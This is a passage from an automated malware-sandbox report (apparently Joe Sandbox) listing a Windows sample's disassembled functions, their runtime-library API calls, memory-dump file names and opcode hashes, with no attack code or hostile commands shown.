                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2103449a81373f7a349bdb4bb54455197791b4cc648fb741bc3655b5ffb13a7a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65D0C976D67224AF8340EFB4FE0DD8A7BB4EB0E7523118523F905D2760EB748D148A96
                                                                                                                                                                                                                                        Function 002C38AD Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 290fbb681051d4d19c25f0ffce86bd3480786ba29c44a40a767e5763f7c3a1e0
                                                                                                                                                                                                                                        • Instruction ID: 5d688dceaa04ccb42354ba0381f5a6502c488adfbe949c28194d58715452c3c1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 290fbb681051d4d19c25f0ffce86bd3480786ba29c44a40a767e5763f7c3a1e0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83B11370E2424AAFDB11DF98D845FAEBBF1AF05314F148A5DE844A7282C7719E61CF60
                                                                                                                                                                                                                                        Function 002A5640 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 352COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 002A589C
                                                                                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 002A5A5B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::cancel_current_task_strlen
                                                                                                                                                                                                                                        • String ID: ,$false$true
                                                                                                                                                                                                                                        • API String ID: 575380510-760133229
                                                                                                                                                                                                                                        • Opcode ID: ee8737427311d9cfa5559139e8fbed67ef6fc6cbb0c47291dc7b82d3c231c85b
                                                                                                                                                                                                                                        • Instruction ID: 1e409b8c41c26d624ef3b5fd67bc4f70cc7cb512df847b51d26d015600d94a8b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee8737427311d9cfa5559139e8fbed67ef6fc6cbb0c47291dc7b82d3c231c85b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16C1D7B25183069FD310AF64CC85B6BB7E8EF91344F04492CF9958B242FB75D928CB92
                                                                                                                                                                                                                                        Function 002B9664 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,002B965B,002AEBD7,002AD9C8), ref: 002B9672
                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002B9680
                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002B9699
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,002B965B,002AEBD7,002AD9C8), ref: 002B96EB
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                        • Opcode ID: f3bcdc2c436112cb648cfc11aed97a191742947909743aa602f59c565014a3ba
                                                                                                                                                                                                                                        • Instruction ID: 6f20f280f5f177a9d9e512f5d241f2d8109c95819a8beb980037dc706c953c20
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3bcdc2c436112cb648cfc11aed97a191742947909743aa602f59c565014a3ba
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F01B53263A722AE96252FB4BC4EAAB275CEB117F5720432AF661500F1EF52CCF19540
                                                                                                                                                                                                                                        Function 002B9F2C Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 002BA04B
                                                                                                                                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 002BA2C4
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                        • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                        • Opcode ID: de8ab484d78fbfa760fe11987926f7aa5f0f6c79c8cbc9be89329d5a5d6e4f3c
                                                                                                                                                                                                                                        • Instruction ID: 5a655065b5f090c08f284f49f3ac44fcfdac26eb474d47986e8fcb94ce56a283
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de8ab484d78fbfa760fe11987926f7aa5f0f6c79c8cbc9be89329d5a5d6e4f3c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4B18C3182020AEFCF14DFA8C9819EEBBB5BF14390F14455AE9156B212D735DAB1CF92
                                                                                                                                                                                                                                        Function 002A3BE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A3BFC
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A3C1A
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A3C3C
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A3CAA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                        • String ID: ios_base::badbit set
                                                                                                                                                                                                                                        • API String ID: 593203224-3882152299
                                                                                                                                                                                                                                        • Opcode ID: d9e4de3e36e96c33d5c3a33e9b0e020f1b70377c23d0ee8a8fdb848b16315ca1
                                                                                                                                                                                                                                        • Instruction ID: 9bba2307a96eb503a2b548c37baacb28616a4588a5c2414ac2ecd03175ee4dfc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9e4de3e36e96c33d5c3a33e9b0e020f1b70377c23d0ee8a8fdb848b16315ca1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A21A071D182149FD710EF15E849A1AB3A1EB56724F01495EF4889B3A1EF34AE60CF92
                                                                                                                                                                                                                                        Function 002AA5A6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 002AA5AD
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002AA5BA
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002AA624
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002AA63E
                                                                                                                                                                                                                                          • Part of subcall function 002A9CA8: _Yarn.LIBCPMT ref: 002A9CC8
                                                                                                                                                                                                                                          • Part of subcall function 002A9CA8: _Yarn.LIBCPMT ref: 002A9CEC
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Yarn$H_prolog3Lockit::~_
                                                                                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                                                                                        • API String ID: 3084819986-1405518554
                                                                                                                                                                                                                                        • Opcode ID: 11c105e993174107b69decc6215d65d82af9e7a6112b0a07509a54b55b475e0e
                                                                                                                                                                                                                                        • Instruction ID: 3af553b0a4827cc922da94e007db35de4fede5fe8aeaa181ef61ecdb39fb5eaf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11c105e993174107b69decc6215d65d82af9e7a6112b0a07509a54b55b475e0e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED11D071825744DFC720DF6AD48168ABBE4FF29700F50496FE08AC3641DB70AA90CFA6
                                                                                                                                                                                                                                        Function 002B40E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,DAA4AEFB,?,?,00000000,002CAD7A,000000FF,?,002B41AA,00000002,?,002B4246,002B6EA9), ref: 002B411E
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002B4130
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,002CAD7A,000000FF,?,002B41AA,00000002,?,002B4246,002B6EA9), ref: 002B4152
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                        • Opcode ID: c7df588da4af804b74e43aee09cece0aa343e497dd9b697eddff33dde88f2a01
                                                                                                                                                                                                                                        • Instruction ID: b6b09784d75be9d6941b5f2184bffbb0c2e64dc68850ab3ca4df1e9c4b0ace3f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7df588da4af804b74e43aee09cece0aa343e497dd9b697eddff33dde88f2a01
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F901DF31D61619AFDB019F54EC48FEEBBB8FB04B11F044126E811A26A0CB749D00CA90
                                                                                                                                                                                                                                        Function 002BC086 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002BC10B
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002BC1D4
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002BC23B
                                                                                                                                                                                                                                          • Part of subcall function 002BA8D1: RtlAllocateHeap.NTDLL(00000000,002BC8AA,?,?,002BC8AA,00000220,?,00000000,?), ref: 002BA903
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002BC24E
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002BC25B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1423051803-0
                                                                                                                                                                                                                                        • Opcode ID: be77274d9ef13d6bf193f9dec736e2fdb0d1ae94e27a6f40a30eed253de09f58
                                                                                                                                                                                                                                        • Instruction ID: 3249730c1d86981659a6255e2d89b97081cbacc89f9eb932551e39a92e815a88
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be77274d9ef13d6bf193f9dec736e2fdb0d1ae94e27a6f40a30eed253de09f58
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2451A47262024AAFEF219FA4CC45DFB36A9EF85790F250529FD08D6141EB70DD309AA0
                                                                                                                                                                                                                                        Function 002AB857 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 002AB85E
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002AB868
                                                                                                                                                                                                                                        • int.LIBCPMT ref: 002AB87F
                                                                                                                                                                                                                                          • Part of subcall function 002AA613: std::_Lockit::_Lockit.LIBCPMT ref: 002AA624
                                                                                                                                                                                                                                          • Part of subcall function 002AA613: std::_Lockit::~_Lockit.LIBCPMT ref: 002AA63E
                                                                                                                                                                                                                                        • codecvt.LIBCPMT ref: 002AB8A2
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002AB8D9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3716348337-0
                                                                                                                                                                                                                                        • Opcode ID: dba0470d757bf0ac08118c788bfbd3276c1bf33611830861f6ae124fc3946a5e
                                                                                                                                                                                                                                        • Instruction ID: 8d850d3751d76758f3a4042c6656202da125f311a65c64c3d96755402f5ca393
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dba0470d757bf0ac08118c788bfbd3276c1bf33611830861f6ae124fc3946a5e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2012632C241199FCF05EF68D8556ADB779BF46324F14480AE40167282DF789E21CF91
                                                                                                                                                                                                                                        Function 002A9ECE Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 002A9ED5
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A9EE0
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A9F4E
                                                                                                                                                                                                                                          • Part of subcall function 002A9DA2: std::locale::_Locimp::_Locimp.LIBCPMT ref: 002A9DBA
                                                                                                                                                                                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 002A9EFB
                                                                                                                                                                                                                                        • _Yarn.LIBCPMT ref: 002A9F11
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1088826258-0
                                                                                                                                                                                                                                        • Opcode ID: f875db1e11bf066e8a981772c1b221dd69a1731ce3e6a0633a42adbf7be1f91b
                                                                                                                                                                                                                                        • Instruction ID: 6c163a30c74ce44341f8ed67f7dd1718c985ce2f566941e5e5fcc144238a4853
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f875db1e11bf066e8a981772c1b221dd69a1731ce3e6a0633a42adbf7be1f91b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F01D471A251109FC705EF21E84963C7BA1FF86340B14404AE80297381CF389EA2DFD1
                                                                                                                                                                                                                                        Function 002A5D40 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 483COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strcspn
                                                                                                                                                                                                                                        • String ID: .$invalid string position
                                                                                                                                                                                                                                        • API String ID: 3709121408-2424062830
                                                                                                                                                                                                                                        • Opcode ID: 0f6801b738f2e54d433e1ef105e5aedeedd2d1e95cd235afcb007515db076f81
                                                                                                                                                                                                                                        • Instruction ID: 217bc1f832cddcf29f5ac8f0c681c2b5a7b07d483ff5286a142165f97d240e75
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f6801b738f2e54d433e1ef105e5aedeedd2d1e95cd235afcb007515db076f81
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE02D2706283059FC714DF24C484A6AB7E5FF8A304F14896DF8958B362EB70ED65CB82
                                                                                                                                                                                                                                        Function 002A22C0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
